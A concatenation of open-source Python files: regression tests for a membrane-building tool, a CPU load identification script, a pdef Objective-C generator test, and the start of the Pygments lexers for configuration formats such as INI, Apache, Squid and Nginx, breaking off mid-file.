log = str(log)
return out, err, log, returncode
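# A minimal usage sketch for the runners above (hypothetical arguments, for
# illustration only):
#   out, err, log, returncode = _run_internal(['-f', '1ubq.pdb'])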
def run_program(arguments, input_directory=None, runner=_run_internal):
"""
    Run the program with the given arguments.
    Insane is run in a copy of `input_directory`.
    """
    # Copy the content of the input directory into the current directory if
    # an input directory is provided.
if input_directory is not None:
for path in glob.glob(os.path.join(input_directory, '*')):
if os.path.isdir(path):
                # shutil.copytree requires that the destination does not
                # exist yet, so copy the tree under its own base name.
                shutil.copytree(path, os.path.basename(path))
else:
shutil.copy2(path, '.')
out, err, log, returncode = runner(arguments)
print("** {} exited with return code {}.".format(PROGRAM.capitalize(), returncode))
if returncode:
print(err)
return out, err, log, returncode
def run_and_compare(arguments, input_dir, ref_dir, runner):
"""
    Run the program and compare its output against a reference.
    """
    # Create the command as a list for subprocess.Popen.
    # The arguments can be passed to the current function as a string or as
    # a list of arguments. If they are passed as a string, they need to be
    # converted to a list.
arguments = _arguments_as_list(arguments)
ref_stdout = os.path.join(ref_dir, 'stdout')
ref_stderr = os.path.join(ref_dir, 'stderr')
ref_log = os.path.join(ref_dir, 'testlog')
    # We want the program to run in a temporary directory. This keeps the
    # file system clean, and avoids mixing the outputs of different tests.
with utils.tempdir():
out, err, log, returncode = run_program(arguments, input_dir, runner=runner)
assert not returncode
utils.compare(utils.ContextStringIO(out), ref_stdout)
utils.compare(utils.ContextStringIO(err), ref_stderr)
utils.compare(utils.ContextStringIO(log), ref_log)
utils.compare_directories('./', ref_dir,
ignore=('stderr', 'stdout', 'testlog'))
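# A minimal usage sketch (hypothetical case, for illustration only):
#   run_and_compare('-f 1ubq.pdb',
#                   os.path.join(INPUT_DIR, '1ubq'),
#                   _reference_path('-f 1ubq.pdb'),
#                   _run_internal)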
def _test_simple_cases():
"""
This function generates test functions for nosetests. These test functions
    execute insane with the arguments listed in SIMPLE_TEST_CASES.
"""
for case in SIMPLE_TEST_CASES:
case_args, input_dir, alias = _split_case(case)
        ref_dir = _reference_path(case_args, alias)
        # The test generator could yield run_and_compare directly. But then
        # the verbose display of nosetests would get crowded with the very
        # long, redundant names of the reference files. Using a partial
        # function displays only the arguments passed to insane.
        _test_case = functools.partial(
            run_and_compare,
            ref_dir=ref_dir,
            runner=_run_internal)
        _test_case.__doc__ = ' '.join([EXECUTABLE, case_args])
        yield (_test_case, case_args, input_dir)
def test_simple_cases_internal():
"""
This function generates test functions for nosetests. These test functions
    call insane's main function with the arguments listed in SIMPLE_TEST_CASES.
"""
for case in SIMPLE_TEST_CASES:
case_args, input_dir, alias = _split_case(case)
ref_dir = _reference_path(case_args, alias)
        # The test generator could yield run_and_compare directly. But then
        # the verbose display of nosetests would get crowded with the very
        # long, redundant names of the reference files. Using a partial
        # function displays only the arguments passed to insane.
_test_case = functools.partial(
run_and_compare,
ref_dir=ref_dir,
runner=_run_internal)
yield (_test_case, case_args, input_dir)
class TestGroTester(object):
"""
    Test that the comparison of GRO files catches differences.
"""
ref_gro_content = """\
INSANE! Membrane UpperLeaflet>POPC=1 LowerLeaflet>POPC=1
4
1POPC NC3 1 2.111 14.647 11.951
1POPC PO4 2 2.177 14.644 11.651
1POPC GL1 3 2.128 14.642 11.351
1POPC GL2 4 1.961 14.651 11.351
10 10 10"""
def test_equal(self):
"""
Make sure that identical files do not fail.
"""
with utils.tempdir():
with open('ref.gro', 'w') as outfile:
print(textwrap.dedent(self.ref_gro_content),
file=outfile, end='')
utils.assert_gro_equal('ref.gro', 'ref.gro')
def test_diff_x(self):
"""
        Make sure that an error in the coordinates is caught.
"""
gro_content = """\
INSANE! Membrane UpperLeaflet>POPC=1 LowerLeaflet>POPC=1
4
1POPC NC3 1 2.111 14.647 11.951
1POPC PO4 2 2.177 14.644 11.651
1POPC GL1 3 2.128 14.642 11.353 # Is not within tolerance
1POPC GL2 4 1.961 14.651 11.351
10 10 10"""
with utils.tempdir():
with open('ref.gro', 'w') as outfile:
print(textwrap.dedent(self.ref_gro_content),
file=outfile, end='')
with open('content.gro', 'w') as outfile:
print(textwrap.dedent(gro_content), file=outfile, end='')
assert_raises(AssertionError, utils.assert_gro_equal,
'content.gro', 'ref.gro')
def test_diff_in_tolerance(self):
"""
Make sure that small errors in coordinates are not caught.
"""
gro_content = """\
INSANE! Membrane UpperLeaflet>POPC=1 LowerLeaflet>POPC=1
4
1POPC NC3 1 2.111 14.647 11.951
1POPC PO4 2 2.177 14.644 11.651
1POPC GL1 3 2.128 14.642 11.352 # Is within tolerance
1POPC GL2 4 1.961 14.651 11.351
10 10 10"""
with utils.tempdir():
with open('ref.gro', 'w') as outfile:
print(textwrap.dedent(self.ref_gro_content),
file=outfile, end='')
with open('content.gro', 'w') as outfile:
print(textwrap.dedent(gro_content), file=outfile, end='')
utils.assert_gro_equal('content.gro', 'ref.gro')
def test_diff_natoms(self):
"""
        Make sure that a difference in the number of atoms is caught.
"""
gro_content = """\
INSANE! Membrane UpperLeaflet>POPC=1 LowerLeaflet>POPC=1
6
1POPC NC3 1 2.111 14.647 11.951
1POPC PO4 2 2.177 14.644 11.651
1POPC GL1 3 2.128 14.642 11.351
1POPC GL2 4 1.961 14.651 11.351
1POPC C1A 5 2.125 14.651 11.051
1POPC D2A 6 2.134 14.602 10.751
10 10 10"""
with utils.tempdir():
with open('ref.gro', 'w') as outfile:
print(textwrap.dedent(self.ref_gro_content),
file=outfile, end='')
with open('content.gro', 'w') as outfile:
print(textwrap.dedent(gro_content), file=outfile, end='')
assert_raises(AssertionError, utils.assert_gro_equal,
'content.gro', 'ref.gro')
def test_diff_title(self):
"""
Make sure that a different title is caught.
"""
gro_content = """\
A different title
4
1POPC NC3 1 2.111 14.647 11.951
1POPC PO4 2 2.177 14.644 11.651
1POPC GL1 3 2.128 14.642 11.351
1POPC GL2 4 1.961 14.651 11.351
10 10 10"""
with utils.tempdir():
with open('ref.gro', 'w') as outfile:
print(textwrap.dedent(self.ref_gro_content),
file=outfile, end='')
with open('content.gro', 'w') as outfile:
print(textwrap.dedent(gro_content), file=outfile, end='')
assert_raises(AssertionError, utils.assert_gro_equal,
'content.gro', 'ref.gro')
def test_diff_box(self):
"""
Make sure that a different box is caught.
"""
gro_content = """\
INSANE! Membrane UpperLeaflet>POPC=1 LowerLeaflet>POPC=1
4
1POPC NC3 1 2.111 14.647 11.951
1POPC PO4 2 2.177 14.644 11.651
1POPC GL1 3 2.128 14.642 11.351
1POPC GL2 4 1.961 14.651 11.351
10 9.9 10 9.08 4 54"""
with utils.tempdir():
with open('ref.gro', 'w') as outfile:
print(textwrap.dedent(self.ref_gro_content),
file=outfile, end='')
with open('content.gro', 'w') as outfile:
print(textwrap.dedent(gro_content), file=outfile, end='')
assert_raises(AssertionError, utils.assert_gro_equal,
'content.gro', 'ref.gro')
def test_diff_field(self):
"""
Make sure that a difference in a field is caught.
"""
gro_content = """\
INSANE! Membrane UpperLeaflet>POPC=1 LowerLeaflet>POPC=1
4
1POPC NC3 1 2.111 14.647 11.951
1DIFF PO4 2 2.177 14.644 11.651
1POPC GL1 3 2.128 14.642 11.351
1POPC GL2 4 1.961 14.651 11.351
10 10 10"""
with utils.tempdir():
with open('ref.gro', 'w') as outfile:
print(textwrap.dedent(self.ref_gro_content),
file=outfile, end='')
with open('content.gro', 'w') as outfile:
print(textwrap.dedent(gro_content), file=outfile, end='')
assert_raises(AssertionError, utils.assert_gro_equal,
'content.gro', 'ref.gro')
def generate_simple_case_references():
"""
    Run the program to generate reference files for the simple regression tests.
"""
for case in SIMPLE_TEST_CASES:
case_args, input_dir, alias = _split_case(case)
arguments = _arguments_as_list(case_args)
ref_dir = _reference_path(case_args, alias)
ref_stdout = os.path.join(ref_dir, 'stdout')
ref_stderr = os.path.join(ref_dir, 'stderr')
ref_log = os.path.join(ref_dir, 'testlog')
if os.path.exists(ref_dir):
shutil.rmtree(ref_dir)
os.mkdir(ref_dir)
with utils.in_directory(ref_dir):
print(PROGRAM + ' ' + ' '.join(arguments))
out, err, log, _ = run_program(arguments, input_dir)
            with open(ref_stdout, 'w') as outfile:
                outfile.write(out)
            with open(ref_stderr, 'w') as outfile:
                outfile.write(err)
with open(ref_log, 'w') as outfile:
print(log, end='', file=outfile)
def clean_simple_case_references():
"""
Delete reference files for the simple tests if they are not in use anymore.
"""
simple_test_cases = [_split_case(case)[2] for case in SIMPLE_TEST_CASES]
simple_case_ref_data = os.path.join(DATA_DIR, 'simple_case')
for path in glob.glob(os.path.join(simple_case_ref_data, '*')):
base_name = os.path.basename(os.path.splitext(path)[0])
if base_name not in simple_test_cases:
print(path)
os.remove(path)
def main():
"""
Command line entry point.
"""
help_ = """
    Generate or clean the reference files for the program's regression tests.
{0} gen: generate the files
{0} clean: clean the unused files
nosetests -v: run the tests
""".format(sys.argv[0])
commands = {'gen': generate_simple_case_references,
'clean': clean_simple_case_references}
if len(sys.argv) != 2:
print(help_, file=sys.stderr)
sys.exit(1)
    try:
        commands[sys.argv[1]]()
    except KeyError:
        print("Unrecognized keyword '{}'.".format(sys.argv[1]))
        print(help_, file=sys.stderr)
        sys.exit(1)
if __name__ == '__main__':
main()
|
Tsjerk/Martinize
|
tests/test_regression.py
|
Python
|
gpl-2.0
| 19,858
|
#!/usr/bin/python
#Authors: Gaetano Carlucci
# Giuseppe Cofano
import time
import json
import matplotlib.pyplot as plt
import sys
import os
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)) + '/../utils')
from Monitor import MonitorThread
from openLoopActuator import openLoopActuator
if __name__ == "__main__":
######################################################
# IDENTIFICATION TEST #
######################################################
# testing activities
    # this test aims to characterize the CPU
testing = 1
dynamics_plot_online = 0
if testing == 1:
        # The first sequence below is immediately overridden by the second
        # one and is kept only for reference.
        #sleepTimeSequence = [0.001, 0.005, 0.01, 0.02, 0.03, 0.08, 0.1, 0.15, 0.2, 0.3, 0.4, 0.5]
        sleepTimeSequence = [0.001, 0.03, 0.02, 0.00, 0.04, 0.05, 0.03, 0.01, 0.2, 0.05, 0.01]
#sleepTimeSequence = [0.005, 0.02]
stepPeriod = 4
monitor = MonitorThread(0, 0.1)
monitor.start()
actuator = openLoopActuator(monitor, len(sleepTimeSequence) * stepPeriod, 0, dynamics_plot_online)
actuator.run_sequence(sleepTimeSequence)
monitor.running = 0
dynamics = monitor.getDynamics()
actuator.close()
monitor.join()
with open('identification_data', 'w') as outfile:
json.dump(dynamics, outfile)
else:
with open('identification_data', 'r') as outfile:
dynamics = json.load(outfile)
    # plt.subplots() already creates a figure; a separate plt.figure() call
    # would only leave an unused empty figure behind.
    fig, ax1 = plt.subplots()
ax1.set_ylabel('CPU Load (%)', color='b')
ax1.plot(dynamics['time'], dynamics['cpu'], 'b-')
ax1.set_xlabel('Time [ms]')
ax1.grid(True)
for tl in ax1.get_yticklabels():
tl.set_color('b')
ax2 = plt.twinx()
ax2.set_ylabel('Sleep Time Target(s)', color='r')
ax2.plot(dynamics['time'], dynamics['sleepTimeTarget'], 'r-')
ax2.grid(True)
for tl in ax2.get_yticklabels():
tl.set_color('r')
plt.savefig('Identification.png', dpi=100)
plt.close()
|
GaetanoCarlucci/CPULoadGenerator
|
tests/Identification2.py
|
Python
|
mit
| 2,038
|
# encoding: utf-8
import os
import shutil
import tempfile
import unittest
import pdefc
from pdefc import lang, objc
class TestGenerator(unittest.TestCase):
def setUp(self):
self.generator = objc.Generator(prefix='PD')
def package(self):
path = os.path.join(os.path.dirname(__file__), 'test.pdef')
return pdefc.compile(path)
def test_generate__should_generate_objc_files(self):
dst = tempfile.mkdtemp('objc-pdef-tests')
try:
package = self.package()
objc.generate(package, dst, prefix='PD')
files = ['PDTestNumber', 'PDTestStruct', 'PDTestInterface']
for file in files:
path = os.path.join(dst, file)
header = '%s.h' % path
impl = '%s.m' % path
assert os.path.exists(header), 'Header file does not exist %s' % header
assert os.path.exists(impl), 'Impl file does not exist %s' % impl
finally:
shutil.rmtree(dst, ignore_errors=True)
def test_objc_name__should_prefix_and_suffix_struct(self):
struct = lang.Struct('Test')
name = self.generator.objc_name(struct)
assert name == 'PDTestStruct'
def test_objc_name__should_prefix_and_suffix_iface(self):
iface = lang.Interface('Test')
name = self.generator.objc_name(iface)
assert name == 'PDTestInterface'
def test_method_options__should_join_method_type_and_request(self):
method = lang.Method('method', type=lang.MethodType.POST,
args=[lang.Argument('arg', lang.INT32)],
is_request=True)
options = self.generator.objc_method_options(method)
assert options == 'PDMethodPost|PDMethodRequest'
|
pdef/pdef
|
compiler/pdefc/objc/test.py
|
Python
|
apache-2.0
| 1,863
|
"""
pygments.lexers.configs
~~~~~~~~~~~~~~~~~~~~~~~
Lexers for configuration file formats.
:copyright: Copyright 2006-2021 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, default, words, bygroups, include, using
from pygments.token import Text, Comment, Operator, Keyword, Name, String, \
Number, Punctuation, Whitespace, Literal, Generic
from pygments.lexers.shell import BashLexer
from pygments.lexers.data import JsonLexer
__all__ = ['IniLexer', 'RegeditLexer', 'PropertiesLexer', 'KconfigLexer',
'Cfengine3Lexer', 'ApacheConfLexer', 'SquidConfLexer',
'NginxConfLexer', 'LighttpdConfLexer', 'DockerLexer',
'TerraformLexer', 'TermcapLexer', 'TerminfoLexer',
'PkgConfigLexer', 'PacmanConfLexer', 'AugeasLexer', 'TOMLLexer',
'NestedTextLexer', 'SingularityLexer']
class IniLexer(RegexLexer):
"""
Lexer for configuration files in INI style.
"""
name = 'INI'
aliases = ['ini', 'cfg', 'dosini']
filenames = [
'*.ini', '*.cfg', '*.inf',
# systemd unit files
# https://www.freedesktop.org/software/systemd/man/systemd.unit.html
'*.service', '*.socket', '*.device', '*.mount', '*.automount',
'*.swap', '*.target', '*.path', '*.timer', '*.slice', '*.scope',
]
mimetypes = ['text/x-ini', 'text/inf']
tokens = {
'root': [
(r'\s+', Text),
(r'[;#].*', Comment.Single),
(r'\[.*?\]$', Keyword),
(r'(.*?)([ \t]*)(=)([ \t]*)([^\t\n]*)',
bygroups(Name.Attribute, Text, Operator, Text, String)),
# standalone option, supported by some INI parsers
(r'(.+?)$', Name.Attribute),
],
}
def analyse_text(text):
npos = text.find('\n')
if npos < 3:
return False
return text[0] == '[' and text[npos-1] == ']'
class RegeditLexer(RegexLexer):
"""
Lexer for `Windows Registry
<http://en.wikipedia.org/wiki/Windows_Registry#.REG_files>`_ files produced
by regedit.
.. versionadded:: 1.6
"""
name = 'reg'
aliases = ['registry']
filenames = ['*.reg']
mimetypes = ['text/x-windows-registry']
tokens = {
'root': [
(r'Windows Registry Editor.*', Text),
(r'\s+', Text),
(r'[;#].*', Comment.Single),
(r'(\[)(-?)(HKEY_[A-Z_]+)(.*?\])$',
bygroups(Keyword, Operator, Name.Builtin, Keyword)),
# String keys, which obey somewhat normal escaping
(r'("(?:\\"|\\\\|[^"])+")([ \t]*)(=)([ \t]*)',
bygroups(Name.Attribute, Text, Operator, Text),
'value'),
# Bare keys (includes @)
(r'(.*?)([ \t]*)(=)([ \t]*)',
bygroups(Name.Attribute, Text, Operator, Text),
'value'),
],
'value': [
(r'-', Operator, '#pop'), # delete value
(r'(dword|hex(?:\([0-9a-fA-F]\))?)(:)([0-9a-fA-F,]+)',
bygroups(Name.Variable, Punctuation, Number), '#pop'),
# As far as I know, .reg files do not support line continuation.
(r'.+', String, '#pop'),
default('#pop'),
]
}
def analyse_text(text):
return text.startswith('Windows Registry Editor')
class PropertiesLexer(RegexLexer):
"""
Lexer for configuration files in Java's properties format.
Note: trailing whitespace counts as part of the value as per spec
.. versionadded:: 1.4
"""
name = 'Properties'
aliases = ['properties', 'jproperties']
filenames = ['*.properties']
mimetypes = ['text/x-java-properties']
tokens = {
'root': [
(r'^(\w+)([ \t])(\w+\s*)$', bygroups(Name.Attribute, Text, String)),
(r'^\w+(\\[ \t]\w*)*$', Name.Attribute),
(r'(^ *)([#!].*)', bygroups(Text, Comment)),
# More controversial comments
(r'(^ *)((?:;|//).*)', bygroups(Text, Comment)),
(r'(.*?)([ \t]*)([=:])([ \t]*)(.*(?:(?<=\\)\n.*)*)',
bygroups(Name.Attribute, Text, Operator, Text, String)),
(r'\s', Text),
],
}
def _rx_indent(level):
# Kconfig *always* interprets a tab as 8 spaces, so this is the default.
# Edit this if you are in an environment where KconfigLexer gets expanded
# input (tabs expanded to spaces) and the expansion tab width is != 8,
# e.g. in connection with Trac (trac.ini, [mimeviewer], tab_width).
# Value range here is 2 <= {tab_width} <= 8.
tab_width = 8
# Regex matching a given indentation {level}, assuming that indentation is
# a multiple of {tab_width}. In other cases there might be problems.
if tab_width == 2:
space_repeat = '+'
else:
space_repeat = '{1,%d}' % (tab_width - 1)
if level == 1:
level_repeat = ''
else:
level_repeat = '{%s}' % level
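    # For example, with the default tab_width == 8 and level == 2, the
    # returned pattern is: (?:\t| {1,7}\t| {8}){2}.*\n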
return r'(?:\t| %s\t| {%s})%s.*\n' % (space_repeat, tab_width, level_repeat)
class KconfigLexer(RegexLexer):
"""
For Linux-style Kconfig files.
.. versionadded:: 1.6
"""
name = 'Kconfig'
aliases = ['kconfig', 'menuconfig', 'linux-config', 'kernel-config']
# Adjust this if new kconfig file names appear in your environment
filenames = ['Kconfig*', '*Config.in*', 'external.in*',
'standard-modules.in']
mimetypes = ['text/x-kconfig']
# No re.MULTILINE, indentation-aware help text needs line-by-line handling
flags = 0
def call_indent(level):
# If indentation >= {level} is detected, enter state 'indent{level}'
return (_rx_indent(level), String.Doc, 'indent%s' % level)
def do_indent(level):
# Print paragraphs of indentation level >= {level} as String.Doc,
# ignoring blank lines. Then return to 'root' state.
return [
(_rx_indent(level), String.Doc),
(r'\s*\n', Text),
default('#pop:2')
]
tokens = {
'root': [
(r'\s+', Text),
(r'#.*?\n', Comment.Single),
(words((
'mainmenu', 'config', 'menuconfig', 'choice', 'endchoice',
'comment', 'menu', 'endmenu', 'visible if', 'if', 'endif',
'source', 'prompt', 'select', 'depends on', 'default',
'range', 'option'), suffix=r'\b'),
Keyword),
(r'(---help---|help)[\t ]*\n', Keyword, 'help'),
(r'(bool|tristate|string|hex|int|defconfig_list|modules|env)\b',
Name.Builtin),
(r'[!=&|]', Operator),
(r'[()]', Punctuation),
(r'[0-9]+', Number.Integer),
(r"'(''|[^'])*'", String.Single),
(r'"(""|[^"])*"', String.Double),
(r'\S+', Text),
],
# Help text is indented, multi-line and ends when a lower indentation
# level is detected.
'help': [
# Skip blank lines after help token, if any
(r'\s*\n', Text),
# Determine the first help line's indentation level heuristically(!).
# Attention: this is not perfect, but works for 99% of "normal"
# indentation schemes up to a max. indentation level of 7.
call_indent(7),
call_indent(6),
call_indent(5),
call_indent(4),
call_indent(3),
call_indent(2),
call_indent(1),
default('#pop'), # for incomplete help sections without text
],
# Handle text for indentation levels 7 to 1
'indent7': do_indent(7),
'indent6': do_indent(6),
'indent5': do_indent(5),
'indent4': do_indent(4),
'indent3': do_indent(3),
'indent2': do_indent(2),
'indent1': do_indent(1),
}
class Cfengine3Lexer(RegexLexer):
"""
Lexer for `CFEngine3 <http://cfengine.org>`_ policy files.
.. versionadded:: 1.5
"""
name = 'CFEngine3'
aliases = ['cfengine3', 'cf3']
filenames = ['*.cf']
mimetypes = []
tokens = {
'root': [
(r'#.*?\n', Comment),
(r'(body)(\s+)(\S+)(\s+)(control)',
bygroups(Keyword, Text, Keyword, Text, Keyword)),
(r'(body|bundle)(\s+)(\S+)(\s+)(\w+)(\()',
bygroups(Keyword, Text, Keyword, Text, Name.Function, Punctuation),
'arglist'),
(r'(body|bundle)(\s+)(\S+)(\s+)(\w+)',
bygroups(Keyword, Text, Keyword, Text, Name.Function)),
(r'(")([^"]+)(")(\s+)(string|slist|int|real)(\s*)(=>)(\s*)',
bygroups(Punctuation, Name.Variable, Punctuation,
Text, Keyword.Type, Text, Operator, Text)),
(r'(\S+)(\s*)(=>)(\s*)',
bygroups(Keyword.Reserved, Text, Operator, Text)),
(r'"', String, 'string'),
(r'(\w+)(\()', bygroups(Name.Function, Punctuation)),
(r'([\w.!&|()]+)(::)', bygroups(Name.Class, Punctuation)),
(r'(\w+)(:)', bygroups(Keyword.Declaration, Punctuation)),
(r'@[{(][^)}]+[})]', Name.Variable),
(r'[(){},;]', Punctuation),
(r'=>', Operator),
(r'->', Operator),
(r'\d+\.\d+', Number.Float),
(r'\d+', Number.Integer),
(r'\w+', Name.Function),
(r'\s+', Text),
],
'string': [
(r'\$[{(]', String.Interpol, 'interpol'),
(r'\\.', String.Escape),
(r'"', String, '#pop'),
(r'\n', String),
(r'.', String),
],
'interpol': [
(r'\$[{(]', String.Interpol, '#push'),
(r'[})]', String.Interpol, '#pop'),
(r'[^${()}]+', String.Interpol),
],
'arglist': [
(r'\)', Punctuation, '#pop'),
(r',', Punctuation),
(r'\w+', Name.Variable),
(r'\s+', Text),
],
}
class ApacheConfLexer(RegexLexer):
"""
Lexer for configuration files following the Apache config file
format.
.. versionadded:: 0.6
"""
name = 'ApacheConf'
aliases = ['apacheconf', 'aconf', 'apache']
filenames = ['.htaccess', 'apache.conf', 'apache2.conf']
mimetypes = ['text/x-apacheconf']
flags = re.MULTILINE | re.IGNORECASE
tokens = {
'root': [
(r'\s+', Text),
(r'#(.*\\\n)+.*$|(#.*?)$', Comment),
(r'(<[^\s>/][^\s>]*)(?:(\s+)(.*))?(>)',
bygroups(Name.Tag, Text, String, Name.Tag)),
(r'(</[^\s>]+)(>)',
bygroups(Name.Tag, Name.Tag)),
(r'[a-z]\w*', Name.Builtin, 'value'),
(r'\.+', Text),
],
'value': [
(r'\\\n', Text),
(r'$', Text, '#pop'),
(r'\\', Text),
(r'[^\S\n]+', Text),
(r'\d+\.\d+\.\d+\.\d+(?:/\d+)?', Number),
(r'\d+', Number),
(r'/([*a-z0-9][*\w./-]+)', String.Other),
(r'(on|off|none|any|all|double|email|dns|min|minimal|'
r'os|productonly|full|emerg|alert|crit|error|warn|'
r'notice|info|debug|registry|script|inetd|standalone|'
r'user|group)\b', Keyword),
(r'"([^"\\]*(?:\\(.|\n)[^"\\]*)*)"', String.Double),
(r'[^\s"\\]+', Text)
],
}
class SquidConfLexer(RegexLexer):
"""
Lexer for `squid <http://www.squid-cache.org/>`_ configuration files.
.. versionadded:: 0.9
"""
name = 'SquidConf'
aliases = ['squidconf', 'squid.conf', 'squid']
filenames = ['squid.conf']
mimetypes = ['text/x-squidconf']
flags = re.IGNORECASE
keywords = (
"access_log", "acl", "always_direct", "announce_host",
"announce_period", "announce_port", "announce_to", "anonymize_headers",
"append_domain", "as_whois_server", "auth_param_basic",
"authenticate_children", "authenticate_program", "authenticate_ttl",
"broken_posts", "buffered_logs", "cache_access_log", "cache_announce",
"cache_dir", "cache_dns_program", "cache_effective_group",
"cache_effective_user", "cache_host", "cache_host_acl",
"cache_host_domain", "cache_log", "cache_mem", "cache_mem_high",
"cache_mem_low", "cache_mgr", "cachemgr_passwd", "cache_peer",
"cache_peer_access", "cache_replacement_policy", "cache_stoplist",
"cache_stoplist_pattern", "cache_store_log", "cache_swap",
"cache_swap_high", "cache_swap_log", "cache_swap_low", "client_db",
"client_lifetime", "client_netmask", "connect_timeout", "coredump_dir",
"dead_peer_timeout", "debug_options", "delay_access", "delay_class",
"delay_initial_bucket_level", "delay_parameters", "delay_pools",
"deny_info", "dns_children", "dns_defnames", "dns_nameservers",
"dns_testnames", "emulate_httpd_log", "err_html_text",
"fake_user_agent", "firewall_ip", "forwarded_for", "forward_snmpd_port",
"fqdncache_size", "ftpget_options", "ftpget_program", "ftp_list_width",
"ftp_passive", "ftp_user", "half_closed_clients", "header_access",
"header_replace", "hierarchy_stoplist", "high_response_time_warning",
"high_page_fault_warning", "hosts_file", "htcp_port", "http_access",
"http_anonymizer", "httpd_accel", "httpd_accel_host",
"httpd_accel_port", "httpd_accel_uses_host_header",
"httpd_accel_with_proxy", "http_port", "http_reply_access",
"icp_access", "icp_hit_stale", "icp_port", "icp_query_timeout",
"ident_lookup", "ident_lookup_access", "ident_timeout",
"incoming_http_average", "incoming_icp_average", "inside_firewall",
"ipcache_high", "ipcache_low", "ipcache_size", "local_domain",
"local_ip", "logfile_rotate", "log_fqdn", "log_icp_queries",
"log_mime_hdrs", "maximum_object_size", "maximum_single_addr_tries",
"mcast_groups", "mcast_icp_query_timeout", "mcast_miss_addr",
"mcast_miss_encode_key", "mcast_miss_port", "memory_pools",
"memory_pools_limit", "memory_replacement_policy", "mime_table",
"min_http_poll_cnt", "min_icp_poll_cnt", "minimum_direct_hops",
"minimum_object_size", "minimum_retry_timeout", "miss_access",
"negative_dns_ttl", "negative_ttl", "neighbor_timeout",
"neighbor_type_domain", "netdb_high", "netdb_low", "netdb_ping_period",
"netdb_ping_rate", "never_direct", "no_cache", "passthrough_proxy",
"pconn_timeout", "pid_filename", "pinger_program", "positive_dns_ttl",
"prefer_direct", "proxy_auth", "proxy_auth_realm", "query_icmp",
"quick_abort", "quick_abort_max", "quick_abort_min",
"quick_abort_pct", "range_offset_limit", "read_timeout",
"redirect_children", "redirect_program",
"redirect_rewrites_host_header", "reference_age",
"refresh_pattern", "reload_into_ims", "request_body_max_size",
"request_size", "request_timeout", "shutdown_lifetime",
"single_parent_bypass", "siteselect_timeout", "snmp_access",
"snmp_incoming_address", "snmp_port", "source_ping", "ssl_proxy",
"store_avg_object_size", "store_objects_per_bucket",
"strip_query_terms", "swap_level1_dirs", "swap_level2_dirs",
"tcp_incoming_address", "tcp_outgoing_address", "tcp_recv_bufsize",
"test_reachability", "udp_hit_obj", "udp_hit_obj_size",
"udp_incoming_address", "udp_outgoing_address", "unique_hostname",
"unlinkd_program", "uri_whitespace", "useragent_log",
"visible_hostname", "wais_relay", "wais_relay_host", "wais_relay_port",
)
opts = (
"proxy-only", "weight", "ttl", "no-query", "default", "round-robin",
"multicast-responder", "on", "off", "all", "deny", "allow", "via",
"parent", "no-digest", "heap", "lru", "realm", "children", "q1", "q2",
"credentialsttl", "none", "disable", "offline_toggle", "diskd",
)
actions = (
"shutdown", "info", "parameter", "server_list", "client_list",
r'squid.conf',
)
actions_stats = (
"objects", "vm_objects", "utilization", "ipcache", "fqdncache", "dns",
"redirector", "io", "reply_headers", "filedescriptors", "netdb",
)
actions_log = ("status", "enable", "disable", "clear")
acls = (
"url_regex", "urlpath_regex", "referer_regex", "port", "proto",
"req_mime_type", "rep_mime_type", "method", "browser", "user", "src",
"dst", "time", "dstdomain", "ident", "snmp_community",
)
ip_re = (
r'(?:(?:(?:[3-9]\d?|2(?:5[0-5]|[0-4]?\d)?|1\d{0,2}|0x0*[0-9a-f]{1,2}|'
r'0+[1-3]?[0-7]{0,2})(?:\.(?:[3-9]\d?|2(?:5[0-5]|[0-4]?\d)?|1\d{0,2}|'
r'0x0*[0-9a-f]{1,2}|0+[1-3]?[0-7]{0,2})){3})|(?!.*::.*::)(?:(?!:)|'
r':(?=:))(?:[0-9a-f]{0,4}(?:(?<=::)|(?<!::):)){6}(?:[0-9a-f]{0,4}'
r'(?:(?<=::)|(?<!::):)[0-9a-f]{0,4}(?:(?<=::)|(?<!:)|(?<=:)(?<!::):)|'
r'(?:25[0-4]|2[0-4]\d|1\d\d|[1-9]?\d)(?:\.(?:25[0-4]|2[0-4]\d|1\d\d|'
r'[1-9]?\d)){3}))'
)
tokens = {
'root': [
(r'\s+', Whitespace),
(r'#', Comment, 'comment'),
(words(keywords, prefix=r'\b', suffix=r'\b'), Keyword),
(words(opts, prefix=r'\b', suffix=r'\b'), Name.Constant),
# Actions
(words(actions, prefix=r'\b', suffix=r'\b'), String),
(words(actions_stats, prefix=r'stats/', suffix=r'\b'), String),
(words(actions_log, prefix=r'log/', suffix=r'='), String),
(words(acls, prefix=r'\b', suffix=r'\b'), Keyword),
(ip_re + r'(?:/(?:' + ip_re + r'|\b\d+\b))?', Number.Float),
(r'(?:\b\d+\b(?:-\b\d+|%)?)', Number),
(r'\S+', Text),
],
'comment': [
(r'\s*TAG:.*', String.Escape, '#pop'),
(r'.+', Comment, '#pop'),
default('#pop'),
],
}
class NginxConfLexer(RegexLexer):
"""
Lexer for `Nginx <http://nginx.net/>`_ configuration files.
.. versionadded:: 0.11
"""
name = 'Nginx configuration file'
aliases = ['nginx']
filenames = ['nginx.conf']
mimetypes = ['text/x-nginx-conf']
tokens = {
'root': [
(r'(include)(\s+)([^\s;]+)', bygroups(Keyword, Text, Name)),
(r'[^\s;#]+', Keyword, 'stmt'),
include('base'),
],
'block': [
(r'\}', Punctuation, '#pop:2'),
(r'[^\s;#]+', Keyword.Namespace, 'stmt'),
include('base'),
],
'stmt': [
(r'\{', Punctuation, 'block'),
(r';', Punctuation, '#pop'),
include('base'),
],
'base': [
(r'#.*\n', Comment.Single),
(r'on|off', Name.Constant),
(r'\$[^\s;#()]+', Name.Variable),
(r'([a-z0-9.-]+)(:)([0-9]+)',
bygroups(Name, Punctuation, Number.Integer)),
(r'[a-z-]+/[a-z-+]+', String), # mimetype
# (r'[a-zA-Z._-]+', Keyword),
(r'[0-9]+[km]?\b', Number.Integer),
(r'(~)(\s*)([^\s{]+)', bygroups(Punctuation, Text, String.Regex)),
(r'[:=~]', Punctuation),
(r'[^\s;#{}$]+', String), # catch all
(r'/[^\s;#]*', Name), # pathname
(r'\s+', Text),
(r'[$;]', Text), # leftover characters
],
}
class LighttpdConfLexer(RegexLexer):
"""
Lexer for `Lighttpd <http://lighttpd.net/>`_ configuration files.
.. versionadded:: 0.11
"""
name = 'Lighttpd configuration file'
aliases = ['lighttpd', 'lighty']
filenames = ['lighttpd.conf']
mimetypes = ['text/x-lighttpd-conf']
tokens = {
'root': [
(r'#.*\n', Comment.Single),
(r'/\S*', Name), # pathname
